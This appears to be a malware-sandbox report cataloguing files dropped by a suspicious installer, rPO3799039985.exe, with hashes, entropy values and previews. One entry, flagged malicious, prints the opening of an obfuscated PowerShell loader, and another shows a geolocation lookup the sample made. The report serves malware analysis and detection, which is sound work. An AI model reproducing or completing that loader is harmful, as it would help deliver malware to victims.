                                                                                                                                                                                                        Size (bytes):14969
                                                                                                                                                                                                        Entropy (8bit):5.625902218243038
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:U9iIuERzA83h09RZxeIKrb8y9eIKf+qNrB:/IuERzA83h09RZxub8y9eIKfHNd
                                                                                                                                                                                                        MD5:7B169E6533A1190C9D60A7D6DC985A4F
                                                                                                                                                                                                        SHA1:FCC541D7DF586A46A6D31E6E08021E58E2A8A710
                                                                                                                                                                                                        SHA-256:C65C4D3896A140BC82CDB49A2E3FB1EBECF2373C53D20F82AD195A52E4C5309E
                                                                                                                                                                                                        SHA-512:33BC784CE3FD81A545F6D5FD4AC2E1388ADE4FFEBD4955086F95026D248D0AEECE7E95A4942D50FF4EC85281B7517B56EC5D3CE8A853F2A5E13EAD94F14727F4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUris

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                        Entropy (8bit):4.346439344671015
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                        MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                        SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                        SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                        SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):57
                                                                                                                                                                                                        Entropy (8bit):4.556488479039065
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                        MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                        SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                        SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                        SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d0347fe2-03eb-4601-bb53-17effe8e8cb4.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16220
                                                                                                                                                                                                        Entropy (8bit):5.7880850797217
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:Y9iIxuERzA83h09RZxJIPaK8y9b6cZGVKf+qNpuB:DIxuERzA83h09RZxBK8y9b9EKfHNp2
                                                                                                                                                                                                        MD5:D5A0338AA9C7EF2B80106106DF8992F5
                                                                                                                                                                                                        SHA1:F0654AEA0E37BF8478D00DC822EBCB7A84786729
                                                                                                                                                                                                        SHA-256:929336DFBB0EBDE117CC0760BC455A996F7B185E2B59FFB24E8B31DAB7636007
                                                                                                                                                                                                        SHA-512:EEF201A0C823956F6CC33E5743D5E9D1D3E45DA27B1A04BE911AE95837427B16E688243BAD1E5C254DC32AF11A5FEFD61AE7268E53E4479A93717CD37E34A7F8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_polic

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                        Size (bytes):4
                                                                                                                                                                                                        Entropy (8bit):1.5
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Zn:Z
                                                                                                                                                                                                        MD5:20807E605DF9113DB80F9F147B0A14A9
                                                                                                                                                                                                        SHA1:DE36A513DA2B090153819B713FBAF7CD5EB41DB3
                                                                                                                                                                                                        SHA-256:A04A71C66CD0BD011D77F88982931FFCDD818DF124FF6A5AB60FE00E81E6C5F2
                                                                                                                                                                                                        SHA-512:366920A2E345E8D8A382F0B152B4C8A93B1BFD7033EEC21133E86438DD3A153227985081D3CCFA7BF24A1CBB27A688E92DF6BCF9B24EE0BFC63612E65741FB6C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:446.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\f318c755-7a32-480e-a6e8-1ba36fe9b23c.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16220
                                                                                                                                                                                                        Entropy (8bit):5.788004787573794
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:Y9iIxuERzA83h09RZxJIPaN8y9b6cZGVKf+qNpuB:DIxuERzA83h09RZxBN8y9b9EKfHNp2
                                                                                                                                                                                                        MD5:13A92747C93F01C834DDC302207BDF68
                                                                                                                                                                                                        SHA1:3F0A6FA7E54190BFA2EA5C0E389CA46D12DC8767
                                                                                                                                                                                                        SHA-256:5A9C425ECAF11DDAC15F5F3CCE7A81FBD59267B18C7E68AB02CB01F1D1EBAC42
                                                                                                                                                                                                        SHA-512:6B8BFBDC3DD7229F3B1FFC407B3903DC01310915583A73C16608870D2200D9ECBEB90FB26F767FBD5193FE2409AFF5E88B050171F2595F63D4079BEF23C0D679
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_polic

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2278
                                                                                                                                                                                                        Entropy (8bit):3.841134013249316
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:uiTrlKxrgx6Uxl9Il8uaqaM9JLCxsVI0ynSdY+Vzd1rc:mXoY3aOJLCirJe+VU
                                                                                                                                                                                                        MD5:E154882CCFCBA08B62EF88263372C333
                                                                                                                                                                                                        SHA1:A83DC2B492A2F9FD673AA1AF88BA9896D328DD34
                                                                                                                                                                                                        SHA-256:477E984AA5A92E4B4378DABA6CB102A1DAF9D59EB171FDA2DD89C058CEC68389
                                                                                                                                                                                                        SHA-512:1CFB36A07D2B69EB362E789B52EE4AA23DE9F3C229183E038614068DC34E9DBDD318250EE32790A7D0835B696E1359ADD9B3B7F449E1B1A6DA124B44007FD9C3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.O.b.v.R.R.E.0.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.O.r.8.X.n.J.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9472
                                                                                                                                                                                                        Entropy (8bit):4.027856490254046
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:avoj0w8OT14GPkkNOAHmFJhu2YRn06MwBQjnTYJ:av80LlvAHmzh3YR/MwBW0J
                                                                                                                                                                                                        MD5:1BC652C0101081927A26C6BC8A02B209
                                                                                                                                                                                                        SHA1:E241328D078E4BDC38D2FDB9E48675496D032EEE
                                                                                                                                                                                                        SHA-256:621F0954239B550CEF57F22144EFA70C4E8F81C11076603EAD1EDD570FEC8F0A
                                                                                                                                                                                                        SHA-512:4724E042E9E78B39A51B06415BD5FFD84B0A43C923C976BAF135EB8D75E2685D6620D7E5A6CE2E89BC1154EBF2D51C98CEA3E6CE1970A419936E7C69B33B6066
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.j.N.M.X.d.p.S.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.O.r.8.X.n.J.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\json[1].json

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):962
                                                                                                                                                                                                        Entropy (8bit):5.003928223003816
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:tkl/Hnd6CsGkMyGWKyGXPVGArwY3vJv+8aIHrGIArpv/mOAaNO+ao9W7iN5zzkwW:qlPdRNuKyGX85WJ+vXhNlT3/7+GeWro
                                                                                                                                                                                                        MD5:923AE58BF6BBCA000C1FEB30BF9FA958
                                                                                                                                                                                                        SHA1:2A757EEFD49E77523B929D06612932463204DE03
                                                                                                                                                                                                        SHA-256:D4F66C3528D2EF3DA5D6342FE3F5F4D06CA3AF37B93457F2B92A51AEE20D518C
                                                                                                                                                                                                        SHA-512:B31B84BBD215A5592EA40F02AC506B76B40F64AD4FE62E91BA8B8656BDC090C0820A151101F2227439378DB3897EC9C0EE9773588D8B3D52DEF9DCDAF9F1947E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{. "geoplugin_request":"89.187.171.137",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Atlanta",. "geoplugin_region":"Georgia",. "geoplugin_regionCode":"GA",. "geoplugin_regionName":"Georgia",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"524",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"33.7485",. "geoplugin_longitude":"-84.3871",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                        Size (bytes):14744
                                                                                                                                                                                                        Entropy (8bit):4.990428309401091
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdB4NXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdB4NZiA
                                                                                                                                                                                                        MD5:A3F4A4CED5E4717EA59EEDAAA642F0CF
                                                                                                                                                                                                        SHA1:EB40B4929869C8C2A8866A0F06AE166F406FE493
                                                                                                                                                                                                        SHA-256:59B8E05483EA0D66C8F98CB27508791C4066743462559CE29BBF658DD88BEC0E
                                                                                                                                                                                                        SHA-512:804565218357E45BBFEE9661AF75E9941B54E1B6AA656DE02E57A0842BCA8E679F2250E004B4FF7705F4A22C65F9A3A48AF9614A851D8C062DF4DA3B99A67257
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Chaptrel.Mon

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\rPO3799039985.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):350938
                                                                                                                                                                                                        Entropy (8bit):7.548916507996504
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:ZYXVTfZUun7jSk+OHxU/O0bGIGMOZ6xvzyIrajjQQ5ofww8k0FomXHPSXbH0yMs8:yVTfZUun7jSk+w0O2GtZ6xvWIrg508kY
                                                                                                                                                                                                        MD5:CF5FE6D67F3BBD79EE31B92E079DAB2A
                                                                                                                                                                                                        SHA1:3926450B005A8C50523182DF366323C4E47DBE16
                                                                                                                                                                                                        SHA-256:B43742385835A1FD71E347BF6280B9DD0BB4D868182A52E1717ABA589034B303
                                                                                                                                                                                                        SHA-512:C3581F53C363A73111476E65361C160A8E4394A546DDAB1F864D27EAE3B32098B42E10B2717D6C13F16E92685DD0D6435A1D4AB5A21C02728C7152169177E193
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:...LL.........#...................-...W......>>.M.sss..........UUUUU.L...,,........................................................VVVVV....ccc................777....WWWW..............{{............x.........EE.........................*.K.......nn....................x.....rr........"....###............EE........ss.............||............{{......DDDDDDDD............999.|................QQ..................,,.....!!.......................,..........7....666...IIIIII.........dd.....b.........RR.............................................RRR...,..........aa.....7..............................Q..............................................>.9.............................9......Z..:....***....o...H.................T..b......e........ ....&&..(.ii..........K..~...........................WWWW............""....F.[....///////............\\........PP.................~..&&.............f.......DDDD.............NN.)...........c..............%...........................;.`.II....XXX........Z.d.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Headstall33.udr

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\rPO3799039985.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):292996
                                                                                                                                                                                                        Entropy (8bit):1.2535706245313567
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:rS8DLd83aSNWR2GgpLsBw8Lfo/Vl0lC9ilpJBE9RDXsqG39Zc3acb6yRmEXKIsbZ:DEaIpLIw7r4EJY9RbgFVmiZUKa1EiUO
                                                                                                                                                                                                        MD5:399716C3EC3C1B290590E32C8BD0C0E7
                                                                                                                                                                                                        SHA1:736B213BA4D393B55C413A335AE88A6C898558F0
                                                                                                                                                                                                        SHA-256:C7D6ECCF4B065A8DE79B8BBB0E84D22396E3E7AD7A0B954479B6B44D1DD2B5F9
                                                                                                                                                                                                        SHA-512:113B3AF0F94AAB1F71D6F3253345ADC3F5F0691C32C0F09D1DA7BEF9A5B480E3FA7B81FB4CF373D3A4C15E4F91D5D321C8FEAAFC2C814C86AA24DB838285EDDB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.............................................f..........X..(.............................................s................6...............m..................................r.................................................................................7..d.............V...................X...............................................................................................:.......v.................%.....................................................................5.................."........(.....................................................................k.........q........................................................V...........................................p.u............4........Z...........l......................8.................................................................................9......u...t........................3.............................................................g..................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\rPO3799039985.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4647), with CRLF, LF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):72111
                                                                                                                                                                                                        Entropy (8bit):5.189678053363048
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:XeKu75bBFSm3M7COBFigPfsnIcqBWEuMAD16yG:XeKYF3Sm8GOXig3sIcqBKDEyG
                                                                                                                                                                                                        MD5:BC09FC9CDF0A5DA95E467C52A6D472A3
                                                                                                                                                                                                        SHA1:6AD253AC46DF46C0035F2CE2E20F13A8B0770B91
                                                                                                                                                                                                        SHA-256:FA2A75BB0F0035180B26868B73ADEB572F5009D9DA582CC70EB9BC87D0F06422
                                                                                                                                                                                                        SHA-512:EB8843395DB0636E7778B9A973BE39A222E8503C090796AC6B8CEA64F78FE1EE9F4C37D3813817DE6F0993C70D5842409176B32BACD2A7516D1D7CAE6CBDF7BA
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Preview:$Extance=$Slubberten;..<#Symphylan Overlargeness Overdearness Antilocapridae Cordeliere #>..<#Pregreet Overfactious Anteverting Indskibningernes #>..<#Tamandus Cooked Sloughed Subalgebraical stonesmith blade #>..<#Udholdeligeres Applaud Diffunderedes #>..<#Tagpapfabrikkerne Epipanies Pooch Fusionsdatoers andengradsligningernes Vertiginously Subsidieres #>..<#Mvrer Timeforbruget Forvanskningers Yokeable Stabiliteter latino #>...$Undeprived = @'.Quailys.Fantasi$Hoku.poLO dsgnis Unci ceStre.niacuberswdKnirkengIdyli maAndrocrnEkstraugYndersm=Man.unt$.amarasSInterpiu pietetsHeraclitEvisiteeGnatfann Ince datilv ninSol sancVisceriewaywodes ozosge; Mistin. AtypicfSpermssuSlutfljnLobotomc VixenitLedemotiforbrydoRinniesnOverens E ementBGlistene Pjask,t Pl,moshOpbyg.eo sociocrHyperconSpeci l6humilif9M tzjom Fam li( Emi ra$JordemoLDetronin Civiliu Tilkb dlarceniv .ontakiAmphigokBirgithl lainneiTogbetjnTemp ragAf lipnsmisconcpFimblesjNeum.skeFol,ekocSupersce Prec,pr AflytnnGayal.seFlavour,Toftapr$

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Pennigerous.pac

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\rPO3799039985.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):314736
                                                                                                                                                                                                        Entropy (8bit):1.2449159395564426
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:OJtiGOXJxXqfHlq+f+h/y7XOt3Cc264R6ALPh7UIUcrskV2vh4iMPkSebkDXdA+u:sR+HIhWvho6q+E3VVSRk00LISJ2HZ2+B
                                                                                                                                                                                                        MD5:74D22FA11B6A81B523703D86EE6410CF
                                                                                                                                                                                                        SHA1:B492DC83190A441949C9BCA39CA607BB1AEB99E7
                                                                                                                                                                                                        SHA-256:521321FB45ED43C67F878D1B3FBC4730813745CD5C1F8620EFC687104D274A5F
                                                                                                                                                                                                        SHA-512:F3BA07525FD622F5CA9F1348AE0FFFB76691A72CC291F1EDB3C5F028939C89F2EB661AD0435B4F5AB72692712905AE792D903B38D4B575A06F4B41A309C3CA08
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:................M............q...............................................H......................B.j............................................................................................................................................................................................/............>..............................................L.................................................x...........................................................................+...................e..................................................}...................................L....T...h....................................E...............@.........8......+........N.............................................................n;....................................}..............................................................................................S........U..#..........................................k................H...........................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\rPO3799039985.exe

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):687803
                                                                                                                                                                                                        Entropy (8bit):7.805842466953427
                                                                                                                                                                                                        Encrypted:false
